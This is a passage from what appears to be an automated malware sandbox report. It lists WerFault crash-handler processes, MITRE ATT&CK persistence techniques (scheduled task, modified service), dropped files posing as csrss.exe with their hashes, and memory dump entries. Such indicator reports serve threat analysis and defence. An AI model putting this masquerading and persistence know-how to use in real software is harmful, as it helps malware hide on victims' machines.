PID:2016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2084 -ip 2084
1⤵
PID:628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2084 -ip 2084
1⤵
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2084 -ip 2084
1⤵
PID:2624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe

Download Submit
C:\Windows\rss\csrss.exe

Download Submit
memory/1424-131-0x00000000057B0000-0x0000000005EA6000-memory.dmp

Filesize
7.0MB

Download
memory/1424-132-0x0000000000400000-0x00000000036BC000-memory.dmp

Filesize
50.7MB

Download
memory/1424-130-0x00000000053FD000-0x00000000057A4000-memory.dmp

Filesize
3.7MB

Download
memory/1832-139-0x0000000000000000-mapping.dmp

Download
memory/2084-146-0x0000000000400000-0x00000000036BC000-memory.dmp

Filesize
50.7MB

Download
memory/2084-145-0x0000000005800000-0x0000000005BA7000-memory.dmp

Filesize
3.7MB

Download
memory/2084-140-0x0000000000000000-mapping.dmp

Download
memory/2576-136-0x0000000000000000-mapping.dmp

Download
memory/2592-137-0x0000000000000000-mapping.dmp

Download
memory/3028-143-0x0000000000000000-mapping.dmp

Download
memory/3196-144-0x0000000000000000-mapping.dmp

Download
memory/4328-134-0x00000000053B0000-0x0000000005757000-memory.dmp

Filesize
3.7MB

Download
memory/4328-135-0x0000000000400000-0x00000000036BC000-memory.dmp

Filesize
50.7MB

Download
memory/4328-133-0x0000000000000000-mapping.dmp

Download
memory/4952-149-0x0000000000000000-mapping.dmp

Download
memory/4956-147-0x0000000000000000-mapping.dmp

Download
memory/5092-138-0x0000000000000000-mapping.dmp

Download